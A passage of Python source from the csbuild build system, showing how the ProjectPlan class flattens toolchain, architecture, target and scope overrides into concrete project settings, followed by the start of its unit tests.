\"overrides\":\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Libraries are a special case.\n\t\t\t\t# Any time any project references a library, that library should be moved later in the list.\n\t\t\t\t# Referenced libraries have to be linked after all the libraries that reference them.\n\t\t\t\tif key == \"libraries\":\n\t\t\t\t\tsettings[key] = ordered_set.OrderedSet(settings.get(key, []))\n\t\t\t\t\tsettings[key] -= val\n\t\t\t\t\tsettings[key] |= val\n\t\t\t\t\tcontinue\n\t\t\t\tif isinstance(val, (dict, collections.OrderedDict)):\n\t\t\t\t\tsettings[key] = dict(settings.get(key, {}))\n\t\t\t\t\tsettings[key].update(val)\n\t\t\t\telif isinstance(val, list):\n\t\t\t\t\tsettings[key] = list(settings.get(key, []))\n\t\t\t\t\tsettings[key] += val\n\t\t\t\telif isinstance(val, (set, ordered_set.OrderedSet)):\n\t\t\t\t\tsettings[key] = ordered_set.OrderedSet(settings.get(key, []))\n\t\t\t\t\tsettings[key] |= val\n\t\t\t\telse:\n\t\t\t\t\tif not inScope or key not in self._settings:\n\t\t\t\t\t\tsettings[key] = val\n\t\t# Else this function just recurses down to the next override dict to look for a dict of scopeType\n\n\t\tself._flattenOverrides(settings, overrideDict.get(\"overrides\"), toolchainName, architectureName, targetName, scopeType, inScope)\n\n\tdef _flattenOverrides(self, settings, overrideDict, toolchainName, architectureName, targetName, scopeType=\"\", inScope=False):\n\t\tif overrideDict is None:\n\t\t\treturn\n\n\t\tself._absorbSettings(settings, overrideDict.get(\"toolchain\", {}).get(toolchainName), toolchainName, architectureName, targetName, scopeType, inScope)\n\t\tself._absorbSettings(settings, overrideDict.get(\"architecture\", {}).get(architectureName), toolchainName, architectureName, targetName, scopeType, inScope)\n\t\tself._absorbSettings(settings, overrideDict.get(\"target\", {}).get(targetName), toolchainName, architectureName, targetName, scopeType, inScope)\n\t\tself._absorbSettings(settings, overrideDict.get(\"platform\", {}).get(platform.system()), toolchainName, architectureName, targetName, scopeType, inScope)\n\t\tif scopeType:\n\t\t\tself._absorbSettings(settings, overrideDict.get(\"scope\", {}).get(scopeType), toolchainName, architectureName, targetName, scopeType, True)\n\n\tdef _getFinalValueFromOverride(self, overrideDict, name, toolchainName, architectureName, targetName, default):\n\t\tif overrideDict is not None:\n\t\t\tdefault = overrideDict.get(name, default)\n\t\t\tdefault = self._getFinalValue(overrideDict.get(\"overrides\"), name, toolchainName, architectureName, targetName, default)\n\t\treturn default\n\n\tdef _getFinalValue(self, overrideDict, name, toolchainName, architectureName, targetName, default):\n\t\tif overrideDict is not None:\n\t\t\tdefault = overrideDict.get(\"scope\", {}).get(name, default)\n\t\t\tdefault = self._getFinalValueFromOverride(overrideDict.get(\"toolchain\", {}).get(toolchainName), name, toolchainName, architectureName, targetName, default)\n\t\t\tdefault = self._getFinalValueFromOverride(overrideDict.get(\"architecture\", {}).get(architectureName), name, toolchainName, architectureName, targetName, default)\n\t\t\tdefault = self._getFinalValueFromOverride(overrideDict.get(\"target\", {}).get(targetName), name, toolchainName, architectureName, targetName, default)\n\t\t\tdefault = self._getFinalValueFromOverride(overrideDict.get(\"platform\", {}).get(platform.system()), name, toolchainName, architectureName, targetName, default)\n\t\treturn default\n\n\tdef _flattenDepends(self, flattenedDepends, dependObj):\n\t\t# pylint: disable=protected-access\n\t\tfor depend in dependObj._depends:\n\t\t\tassert depend in allPlans, \"Project {} references unknown dependency {}\".format(dependObj._name, depend)\n\t\t\tif depend == self._name:\n\t\t\t\tcontinue\n\t\t\tself._flattenDepends(flattenedDepends, allPlans[depend])\n\t\t\tflattenedDepends.add(depend)\n\n\t@TypeChecked(toolchainName=(String, _defaultType), architectureName=(String, _defaultType), targetName=(String, _defaultType))\n\tdef ExecutePlan(self, toolchainName, architectureName, targetName):\n\t\t\"\"\"\n\t\tExecute the project plan for a given toolchain and architecture to create a concrete project.\n\n\t\t:param toolchainName: The toolchain to execute the plan for\n\t\t:type toolchainName: str, bytes\n\t\t:param architectureName: The architecture to execute the plan for\n\t\t:type architectureName: str, bytes\n\t\t:param targetName: The target to execute the plan for\n\t\t:type targetName: str, bytes\n\t\t:return: A concrete project\n\t\t:rtype: project.Project\n\t\t\"\"\"\n\t\twith perf_timer.PerfTimer(\"Project plan validation\"):\n\t\t\tassert len(self._workingSettingsStack) == 1 and \\\n\t\t\t\t\tlen(self._workingSettingsStack[0]) == 1 and \\\n\t\t\t\t\tself._workingSettingsStack[0][0] == self._settings and \\\n\t\t\t\t\tlen(self._currentSettingsDicts) == 1 and \\\n\t\t\t\t\tself._currentSettingsDicts[0] == self._settings, \\\n\t\t\t\t\t\"ExecutePlan() called from within a context!\"\n\n\t\t\tfrom .. import ProjectType\n\n\t\t\tif targetName is useDefault:\n\t\t\t\ttargetName = self.defaultTarget\n\t\t\tif toolchainName is useDefault:\n\t\t\t\ttoolchainName = self.defaultToolchain\n\t\t\tif architectureName is useDefault:\n\t\t\t\tif self.defaultArchitecture is useDefault:\n\t\t\t\t\tarchitectureName = self.defaultArchitectureMap[toolchainName]\n\t\t\t\telse:\n\t\t\t\t\tarchitectureName = self.defaultArchitecture\n\n\t\t\tassert \"overrides\" in self._settings \\\n\t\t\t\tand \"toolchain\" in self._settings[\"overrides\"] \\\n\t\t\t\t and toolchainName in self._settings[\"overrides\"][\"toolchain\"], \\\n\t\t\t\t\"Toolchain {} has not been registered for project {}\".format(toolchainName, self._name)\n\n\t\t\ttoolchains = self.selfLimits[\"toolchain\"]\n\t\t\tif toolchains and toolchainName not in toolchains:\n\t\t\t\tlog.Info(\"Project {} does not support toolchain {}\", self.name, toolchainName)\n\t\t\t\treturn None\n\n\t\t\tplatforms = self.selfLimits[\"platform\"]\n\t\t\tif platforms and platform.system() not in platforms:\n\t\t\t\tlog.Info(\"Project {} does not support platform {}\", self.name, platform.system())\n\t\t\t\treturn None\n\n\t\t\tarchitectures = self.selfLimits[\"architecture\"]\n\t\t\tif architectures and architectureName not in architectures:\n\t\t\t\tlog.Info(\"Project {} does not support architecture {}\", self.name, architectureName)\n\t\t\t\treturn None\n\n\t\t\ttargets = self.selfLimits[\"target\"]\n\t\t\tif targets and targetName not in targets:\n\t\t\t\tlog.Info(\"Project {} does not support target {}\", self.name, targetName)\n\t\t\t\treturn None\n\n\t\t\tif targetName not in self.knownTargets:\n\t\t\t\tlog.Info(\"Project {} does not know about target {}\", self.name, targetName)\n\t\t\t\treturn None\n\n\t\twith perf_timer.PerfTimer(\"Flattening settings\"):\n\t\t\tprojectType = self._settings.get(\"projectType\", ProjectType.Application)\n\t\t\tprojectType = self._getFinalValue(self._settings.get(\"overrides\"), \"projectType\", toolchainName, architectureName, targetName, projectType)\n\n\t\t\tsettings = {}\n\t\t\tfor key, value in self._settings.items():\n\t\t\t\tif key == \"overrides\":\n\t\t\t\t\tcontinue\n\t\t\t\tsettings[key] = copy.deepcopy(value)\n\n\t\t\tflattenedDepends = ordered_set.OrderedSet()\n\t\t\tself._flattenDepends(flattenedDepends, self)\n\n\t\t\tlibraries = ordered_set.OrderedSet()\n\t\t\tif \"libraries\" in settings:\n\t\t\t\tlibraries = settings[\"libraries\"]\n\t\t\t\tdel settings[\"libraries\"]\n\n\t\t\tself._flattenOverrides(\n\t\t\t\tsettings,\n\t\t\t\tself._settings.get(\"overrides\", {}),\n\t\t\t\ttoolchainName,\n\t\t\t\tarchitectureName,\n\t\t\t\ttargetName,\n\t\t\t\t\"all\"\n\t\t\t)\n\n\t\t\tfor depend in flattenedDepends:\n\t\t\t\t# pylint: disable=protected-access\n\t\t\t\tdependObj = allPlans[depend] # type: ProjectPlan\n\n\t\t\t\tif projectType == ProjectType.Application:\n\t\t\t\t\tsettings[\"libraries\"] = ordered_set.OrderedSet(settings.get(\"libraries\")) | ordered_set.OrderedSet(\n\t\t\t\t\t\t[\n\t\t\t\t\t\t\tdependObj._getFinalValue(\n\t\t\t\t\t\t\t\tdependObj._settings.get(\"overrides\"),\n\t\t\t\t\t\t\t\t\"outputName\",\n\t\t\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\t\tdependObj._name\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\t]\n\t\t\t\t\t)\n\t\t\t\t\tself._flattenOverrides(\n\t\t\t\t\t\tsettings,\n\t\t\t\t\t\tdependObj._settings.get(\"overrides\", {}),\n\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\"all\"\n\t\t\t\t\t)\n\t\t\t\t\tself._flattenOverrides(\n\t\t\t\t\t\tsettings,\n\t\t\t\t\t\tdependObj._settings.get(\"overrides\", {}),\n\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\"children\"\n\t\t\t\t\t)\n\t\t\t\t\tself._flattenOverrides(\n\t\t\t\t\t\tsettings,\n\t\t\t\t\t\tdependObj._settings.get(\"overrides\", {}),\n\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\"final\"\n\t\t\t\t\t)\n\t\t\t\telse:\n\t\t\t\t\tself._flattenOverrides(\n\t\t\t\t\t\tsettings,\n\t\t\t\t\t\tdependObj._settings.get(\"overrides\", {}),\n\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\"all\"\n\t\t\t\t\t)\n\t\t\t\t\tself._flattenOverrides(\n\t\t\t\t\t\tsettings,\n\t\t\t\t\t\tdependObj._settings.get(\"overrides\", {}),\n\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\"children\"\n\t\t\t\t\t)\n\t\t\t\t\tself._flattenOverrides(\n\t\t\t\t\t\tsettings,\n\t\t\t\t\t\tdependObj._settings.get(\"overrides\", {}),\n\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\"scope\"\n\t\t\t\t\t)\n\n\t\t\tif \"libraries\" in settings:\n\t\t\t\tsettings[\"libraries\"] |= libraries\n\t\t\telse:\n\t\t\t\tsettings[\"libraries\"] = libraries\n\n\t\t\tself._flattenOverrides(settings, self._settings.get(\"overrides\"), toolchainName, architectureName, targetName)\n\n\t\t\ttools = settings.get(\"tools\", set()) - settings.get(\"disabledTools\", set())\n\t\t\tfor tool in tools:\n\t\t\t\tif tool.supportedArchitectures is not None and architectureName not in tool.supportedArchitectures:\n\t\t\t\t\tlog.Info(\"Tool {} does not support architecture {}\", tool.__name__, architectureName)\n\t\t\t\t\treturn None\n\t\t\t\tif tool.supportedPlatforms is not None and platform.system() not in tool.supportedPlatforms:\n\t\t\t\t\tlog.Info(\"Tool {} does not support platform {}\", tool.__name__, platform.system())\n\t\t\t\t\treturn None\n\n\t\treturn project.Project(\n\t\t\tself._name,\n\t\t\tself._workingDirectory,\n\t\t\tflattenedDepends,\n\t\t\tself._priority,\n\t\t\tself._ignoreDependencyOrdering,\n\t\t\tself._autoDiscoverSourceFiles,\n\t\t\tself._autoResolveRpaths,\n\t\t\tsettings,\n\t\t\ttoolchainName,\n\t\t\tarchitectureName,\n\t\t\ttargetName,\n\t\t\tself._scriptDir\n\t\t)\n\n\n\t@TypeChecked(key=String, value=object)\n\tdef SetValue(self, key, value):\n\t\t\"\"\"\n\t\tSet a value in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:param value: The value\n\t\t:type value: Any\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings[key] = value\n\n\t@TypeChecked(key=String)\n\tdef Unset(self, key):\n\t\t\"\"\"\n\t\tSet a value in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tdel settings[key]\n\n\t@TypeChecked(key=String, value=object)\n\tdef ExtendList(self, key, value):\n\t\t\"\"\"\n\t\tExtend a list in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:param value: The value\n\t\t:type value: Any\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings.setdefault(key, []).extend(value)\n\n\t@TypeChecked(key=String, value=object)\n\tdef AppendList(self, key, value):\n\t\t\"\"\"\n\t\tAppend to a list in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:param value: The value\n\t\t:type value: Any\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings.setdefault(key, []).append(value)\n\n\t@TypeChecked(key=String, value=object)\n\tdef UpdateDict(self, key, value):\n\t\t\"\"\"\n\t\tUpdate a dict in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:param value: The key/value pair to add to the named dict\n\t\t:type value: dict\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings.setdefault(key, {}).update(value)\n\n\t@TypeChecked(key=String, value=object)\n\tdef UnionSet(self, key, value):\n\t\t\"\"\"\n\t\tCombine two sets in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:param value: The value\n\t\t:type value: Any\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings.setdefault(key, ordered_set.OrderedSet()).update(value)\n\n\t@TypeChecked(key=String, value=object)\n\tdef AddToSet(self, key, value):\n\t\t\"\"\"\n\t\tAdd to a set in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:param value: The value\n\t\t:type value: Any\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings.setdefault(key, ordered_set.OrderedSet()).add(value)\n\n\t@TypeChecked(key=String)\n\tdef HasValue(self, key):\n\t\t\"\"\"\n\t\tCheck to see if an override is present in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:return: Whether or not the value is present\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tif key in self._settings:\n\t\t\treturn True\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tif key in settings:\n\t\t\t\treturn True\n\t\treturn False\n\n\tdef GetTempToolchainsInCurrentContexts(self, *toolchainNames):\n\t\t\"\"\"\n\t\tGet a list of all values in the currently active contexts.\n\t\t:param toolchainNames: The toolchains to look for\n\t\t:type toolchainNames: str, bytes\n\t\t:return: list of temporary toolchains in currently active contexts\n\t\t:rtype: list\n\t\t\"\"\"\n\t\tret = []\n\t\tfor key in toolchainNames:\n\t\t\ttry:\n\t\t\t\tfor settingsDict in self._workingSettingsStack:\n\t\t\t\t\tfor settings in settingsDict:\n\t\t\t\t\t\toverrideSettings = settings.get(\"overrides\", {}).get(\"toolchain\", {})\n\t\t\t\t\t\tif key in overrideSettings:\n\t\t\t\t\t\t\tif \"_tempToolchain\" in overrideSettings[key]:\n\t\t\t\t\t\t\t\tret.append(overrideSettings[key][\"_tempToolchain\"])\n\t\t\t\t\t\t\t\traise MultiBreak()\n\t\t\texcept MultiBreak:\n\t\t\t\tcontinue\n\t\treturn ret\n\n\t@TypeChecked(key=String, action=Callable)\n\tdef PerformAction(self, key, action):\n\t\t\"\"\"\n\t\tPerform a complex action on values in the settings dictionary.\n\n\t\t:param key: The value to act on\n\t\t:type key: str, bytes\n\t\t:param action: The action to take\n\t\t:type action: A callable accepting a single parameter representing the current value and returning the new value.\n\t\t\tIf the key has not been set for this scope, the current value passed in will be None.\n\t\t\tNote that the value passed in will represent only values in the CURRENT scope, not including\n\t\t\tvalues inherited from parent scopes.\n\n\t\t\tAny type may be stored this way, but if the types are to be merged with values from the parent scope, they\n\t\t\tshould be one of the following types:\n\t\t\t\t- list\n\t\t\t\t- dict\n\t\t\t\t- collections.OrderedDict\n\t\t\t\t- set\n\t\t\t\t- csbuild._utils.ordered_set.OrderedSet\n\t\t\tAny other value will not be merged with values in parent scopes, but will override them.\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings[key] = action(settings.setdefault(key, None))\n\n### Unit Tests ###\n\nclass TestProjectPlan(testcase.TestCase):\n\t\"\"\"Test the project plan\"\"\"\n\t# pylint: disable=invalid-name\n\tdef setUp(self):\n\t\tfrom .._utils import shared_globals\n\t\tself._oldVerbosity = shared_globals.verbosity\n\t\t#INFO logging in ExecutePlan is a little noisy for tests, quieting it down for this test and popping it back up later is good.\n\t\tshared_globals.verbosity = shared_globals.Verbosity.Quiet\n\t\tfrom csbuild.toolchain import Tool\n\t\tclass _nullTool(Tool):\n\t\t\tsupportedArchitectures = None\n\t\t\tinputFiles = None\n\t\t\toutputFiles = {\"\"}\n\n\t\t\tdef Run(self, inputProject, inputFile):\n\t\t\t\tpass\n\n\t\tglobal allPlans\n\t\tallPlans = {}\n\t\t# pylint: disable=protected-access\n\t\tcsbuild.currentPlan._settings = {}\n\t\tcsbuild.currentPlan = ProjectPlan(\"\", \"\", [], 0, False, False, False, \"\")\n\n\t\tcsbuild.currentPlan.knownTargets.update({\"target\"})\n\t\tcsbuild.currentPlan.childTargets.update({\"target\"})\n\n\t\t# Create some mocked in toolchains...\n\t\tcsbuild.currentPlan.EnterContext(\n\t\t\t(\n\t\t\t\t\"toolchain\",\n\t\t\t\t(\n\t\t\t\t\t\"tc1\",\n\t\t\t\t\t\"tc2\",\n\t\t\t\t\t\"none\",\n\t\t\t\t\t\"scope-then-toolchain\",\n\t\t\t\t\t\"toolchain-then-scope\",\n\t\t\t\t\t\"no-toolchain\"\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\n\t\tcsbuild.currentPlan.SetValue(\"tools\", ordered_set.OrderedSet((_nullTool,)))\n\n\t\tcsbuild.currentPlan.LeaveContext()\n\t\tcsbuild.currentPlan.SetValue(\"projectType\", csbuild.ProjectType.Application)\n\n\t\tself._oldPlan = csbuild.currentPlan\n\n\tdef tearDown(self):\n\t\tfrom .._utils import shared_globals\n\t\tcsbuild.currentPlan = self._oldPlan\n\t\tshared_globals.verbosity = self._oldVerbosity\n\n\n\tdef testProjectPlan(self):\n\t\t\"\"\"Ensure all overrides apply properly to the project plan\"\"\"\n\t\tplan = ProjectPlan(\"test\", \"test\", [], 0, False, True, False, \"\")\n\n\t\tplan.SetValue(\"value\", 1)\n\t\tplan.AppendList(\"list\", 2)\n\t\tplan.AddToSet(\"set\", 3)\n\t\tplan.UpdateDict(\"dict\", {4: 5})\n\t\tplan.SetValue(\"hasTarget\", False)\n\n\t\tplan.EnterContext((\"toolchain\", (\"tc1\",)))\n\t\t# pylint: disable=using-constant-test\n\t\t# The constant tests here are just so I can add indents to make the contexts easier to see\n\t\tif True:\n\t\t\tplan.SetValue(\"value\", 6)\n\t\t\tplan.AppendList(\"list\", 7)\n\t\t\tplan.AddToSet(\"set\", 3)\n\t\t\tplan.AddToSet(\"set\", 8)\n\t\t\tplan.UpdateDict(\"dict\", {9: 10})\n\t\t\tplan.UpdateDict(\"dict\", {4: 11})\n\n\t\t\tplan.EnterContext((\"architecture\", (\"ar1\",)))\n\t\t\tif True:\n\t\t\t\tplan.SetValue(\"value\", 12)\n\t\t\t\tplan.AppendList(\"list\", 13)\n\t\t\t\tplan.AddToSet(\"set\", 3)\n\t\t\t\tplan.AddToSet(\"set\", 14)\n\t\t\t\tplan.UpdateDict(\"dict\", {15: 16})\n\t\t\t\tplan.UpdateDict(\"dict\", {4: 17})\n\n\t\t\tplan.LeaveContext()\n\n\t\t\tplan.EnterContext((\"architecture\", (\"ar2\",)))\n\t\t\tif True:\n\t\t\t\tplan.SetValue(\"value\", 18)\n\t\t\t\tplan.AppendList(\"list\", 19)\n\t\t\t\tplan.AddToSet(\"set\", 3)\n\t\t\t\tplan.AddToSet(\"set\", 20)\n\t\t\t\tplan.UpdateDict(\"dict\", {21: 22})\n\t\t\t\tplan.UpdateDict(\"dict\", {4: 23})\n\n\t\t\t\tplan.LeaveContext()\n\t\t\tplan.LeaveContext()\n\n\t\tplan.EnterContext((\"architecture\", (\"ar2\",)))\n\t\tif True:\n\t\t\tplan.AppendList(\"list\", 24)\n\t\t\tplan.AddToSet(\"set\", 25)\n\t\t\tplan.UpdateDict(\"dict\", {26: 27})\n\n\t\t\tplan.LeaveContext()\n\n\t\tplan.EnterContext((\"architecture\", (\"ar3\",)))\n\t\tif True:\n\n\t\t\tplan.SetValue(\"value\", 28)\n\t\t\tplan.AppendList(\"list\", 29)\n\t\t\tplan.AddToSet(\"set\", 3)\n\t\t\tplan.AddToSet(\"set\", 30)\n\t\t\tplan.UpdateDict(\"dict\", {31: 32})\n\t\t\tplan.UpdateDict(\"dict\", {4: 33})\n\n\t\t\tplan.EnterContext((\"toolchain\", (\"tc2\",)))\n\t\t\tif True:\n\t\t\t\tplan.SetValue(\"value\", 34)\n\t\t\t\tplan.AppendList(\"list\", 35)\n\t\t\t\tplan.AddToSet(\"set\", 3)\n\t\t\t\tplan.AddToSet(\"set\", 36)\n\t\t\t\tplan.UpdateDict(\"dict\", {37: 38})\n\t\t\t\tplan.UpdateDict(\"dict\", {4: 39})\n\n\t\t\t\tplan.LeaveContext()\n\t\t\tplan.LeaveContext()\n\n\t\tplan.EnterContext((\"toolchain\", (\"tc2\",)))\n\t\tif True:\n\t\t\tplan.AppendList(\"list\", 40)\n\t\t\tplan.AddToSet(\"set\", 41)\n\t\t\tplan.UpdateDict(\"dict\", {42: 43})\n\n\t\t\tplan.LeaveContext()\n\n\t\tplan.EnterContext((\"target\", (\"target\",)))\n\t\tif True:\n\t\t\tplan.SetValue(\"hasTarget\", True)\n\n\t\t\tplan.LeaveContext()\n\n\t\tproj1 = plan.ExecutePlan(\"tc1\", \"ar1\", \"target\")\n\t\tproj2 = plan.ExecutePlan(\"tc1\", \"ar2\", \"target\")\n\t\tproj3 = plan.ExecutePlan(\"tc1\", \"ar3\", \"target\")\n\t\tproj4 = plan.ExecutePlan(\"tc2\", \"ar1\", \"target\")\n\t\tproj5 = plan.ExecutePlan(\"tc2\", \"ar2\", \"target\")\n\t\tproj6 = plan.ExecutePlan(\"tc2\", \"ar3\", \"target\")\n\n\t\tself.assertIn(\"value\", proj1.settings)\n\t\tself.assertIn(\"list\", proj1.settings)\n\t\tself.assertIn(\"set\", proj1.settings)\n\t\tself.assertIn(\"dict\", proj1.settings)\n\n\t\tself.assertIn(\"value\", proj2.settings)\n\t\tself.assertIn(\"list\", proj2.settings)\n\t\tself.assertIn(\"set\", proj2.settings)\n\t\tself.assertIn(\"dict\", proj2.settings)\n\n\t\tself.assertIn(\"value\", proj3.settings)\n\t\tself.assertIn(\"list\", proj3.settings)\n\t\tself.assertIn(\"set\", proj3.settings)\n\t\tself.assertIn(\"dict\", proj3.settings)\n\n\t\tself.assertIn(\"value\", proj4.settings)\n\t\tself.assertIn(\"list\", proj4.settings)\n\t\tself.assertIn(\"set\", proj4.settings)\n\t\tself.assertIn(\"dict\", proj4.settings)\n\n\t\tself.assertIn(\"value\", proj5.settings)\n\t\tself.assertIn(\"list\", proj5.settings)\n\t\tself.assertIn(\"set\", proj5.settings)\n\t\tself.assertIn(\"dict\", proj5.settings)\n\n\t\tself.assertIn(\"value\", proj6.settings)\n\t\tself.assertIn(\"list\", proj6.settings)\n\t\tself.assertIn(\"set\", proj6.settings)\n\t\tself.assertIn(\"dict\", proj6.settings)\n\n\t\tdef _assertListOrSetMembers(listToCheck, *args):\n\t\t\tself.assertEqual(len(listToCheck), len(args))\n\t\t\tlistToCheck = list(listToCheck)\n\t\t\tfor i, arg in enumerate(args):\n\t\t\t\tself.assertEqual(arg, listToCheck[i])\n\n\t\t_assertListOrSetMembers(proj1.settings[\"list\"], 2, 7, 13)\n\t\t_assertListOrSetMembers(proj2.settings[\"list\"], 2, 7, 19, 24)\n\t\t_assertListOrSetMembers(proj3.settings[\"list\"], 2, 7, 29)\n\t\t_assertListOrSetMembers(proj4.settings[\"list\"], 2, 40)\n\t\t_assertListOrSetMembers(proj5.settings[\"list\"], 2, 40, 24)\n\t\t_assertListOrSetMembers(proj6.settings[\"list\"], 2, 40, 29, 35)\n\n\t\t_assertListOrSetMembers(proj1.settings[\"set\"], 3, 8, 14)\n\t\t_assertListOrSetMembers(proj2.settings[\"set\"], 3, 8, 20, 25)\n\t\t_assertListOrSetMembers(proj3.settings[\"set\"], 3, 8, 30)\n\t\t_assertListOrSetMembers(proj4.settings[\"set\"], 3, 41)\n\t\t_assertListOrSetMembers(proj5.settings[\"set\"], 3, 41, 25)\n\t\t_assertListOrSetMembers(proj6.settings[\"set\"], 3, 41, 30, 36)\n\n\t\tdef _assertDictMembers(dictToCheck, *args):\n\t\t\tself.assertEqual(len(dictToCheck), len(args))\n\t\t\tfor key, val in args:\n\t\t\t\tself.assertEqual(val, dictToCheck[key])\n\n\t\t_assertDictMembers(proj1.settings[\"dict\"], (9, 10), (15, 16), (4, 17))\n\t\t_assertDictMembers(proj2.settings[\"dict\"], (9, 10), (26, 27), (21, 22), (4, 23))\n\t\t_assertDictMembers(proj3.settings[\"dict\"], (9, 10), (31, 32), (4, 33))\n\t\t_assertDictMembers(proj4.settings[\"dict\"], (4, 5), (42, 43))\n\t\t_assertDictMembers(proj5.settings[\"dict\"], (4, 5), (26, 27), (42, 43))\n\t\t_assertDictMembers(proj6.settings[\"dict\"], (31, 32), (37, 38), (4, 39), (42, 43))\n\n\n\t\tself.assertEqual(proj1.settings[\"value\"], 12)\n\t\tself.assertEqual(proj2.settings[\"value\"], 18)\n\t\tself.assertEqual(proj3.settings[\"value\"], 28)\n\t\tself.assertEqual(proj4.settings[\"value\"], 1)\n\t\tself.assertEqual(proj5.settings[\"value\"], 1)\n\t\tself.assertEqual(proj6.settings[\"value\"], 34)\n\n\t\tself.assertTrue(proj1.settings[\"hasTarget\"])\n\t\tself.assertTrue(proj2.settings[\"hasTarget\"])\n\t\tself.assertTrue(proj3.settings[\"hasTarget\"])\n\t\tself.assertTrue(proj4.settings[\"hasTarget\"])\n\t\tself.assertTrue(proj5.settings[\"hasTarget\"])\n\t\tself.assertTrue(proj6.settings[\"hasTarget\"])\n\n\tdef testScope(self):\n\t\t\"\"\"Ensure all scope overrides apply properly to dependent project plans\"\"\"\n\t\tfrom .. import ProjectType\n\n\t\tfirst = ProjectPlan(\"first\", \"test\", [], 0, False, True, False, \"\")\n\t\tsecond = ProjectPlan(\"second\", \"test\", [\"first\"], 0, False, True, False, \"\")\n\t\tthird = ProjectPlan(\"third\", \"test\", [\"second\"], 0, False, True, False, \"\")\n\n\t\tfirst.SetValue(\"projectType\", ProjectType.StaticLibrary)\n\t\tsecond.SetValue(\"projectType\", ProjectType.StaticLibrary)\n\t\tthird.SetValue(\"projectType\", ProjectType.Application)\n\n\t\tthird.AddToSet(\"libraries\", \"lib1\")\n\n\t\tfirst.EnterContext((\"scope\", (\"final\",)))\n\t\t# pylint: disable=using-constant-test\n\t\t# The constant tests here are just so I can add indents to make the contexts easier to see\n\t\tif True:\n\t\t\tfirst.AddToSet(\"libraries\", \"lib2\")\n\t\t\tfirst.SetValue(\"should_be_one\", 2)\n\t\t\tfirst.AddToSet(\"someSet\", \"final\")\n\t\t\tfirst.EnterContext((\"toolchain\", (\"scope-then-toolchain\",)))\n\t\t\tif True:\n\t\t\t\tfirst.AddToSet(\"otherSet\", \"final\")\n\t\t\t\tfirst.AddToSet(\"libraries\", \"lib3\")\n\t\t\t\tfirst.LeaveContext()\n\t\t\tfirst.LeaveContext()\n\n\t\tfirst.EnterContext((\"scope\", (\"intermediate\",)))\n\t\tif True:\n\t\t\tfirst.AddToSet(\"someSet\", \"intermediate\")\n\t\t\tfirst.EnterContext((\"toolchain\", (\"scope-then-toolchain\",)))\n\t\t\tif True:\n\t\t\t\tfirst.AddToSet(\"otherSet\", \"intermediate\")\n\t\t\t\tfirst.LeaveContext()\n\t\t\tfirst.LeaveContext()\n\n\t\tfirst.EnterContext((\"toolchain\", (\"toolchain-then-scope\",)))\n\t\tif True:\n\t\t\tfirst.EnterContext((\"scope\", (\"final\",)))\n\t\t\tif True:\n\t\t\t\tfirst.AddToSet(\"thirdSet\", \"final\")\n\t\t\t\tfirst.AddToSet(\"libraries\", \"lib4\")\n\t\t\t\tfirst.LeaveContext()\n\t\t\tif True:\n\t\t\t\tfirst.EnterContext((\"scope\", (\"intermediate\",)))\n\t\t\t\tfirst.AddToSet(\"thirdSet\", 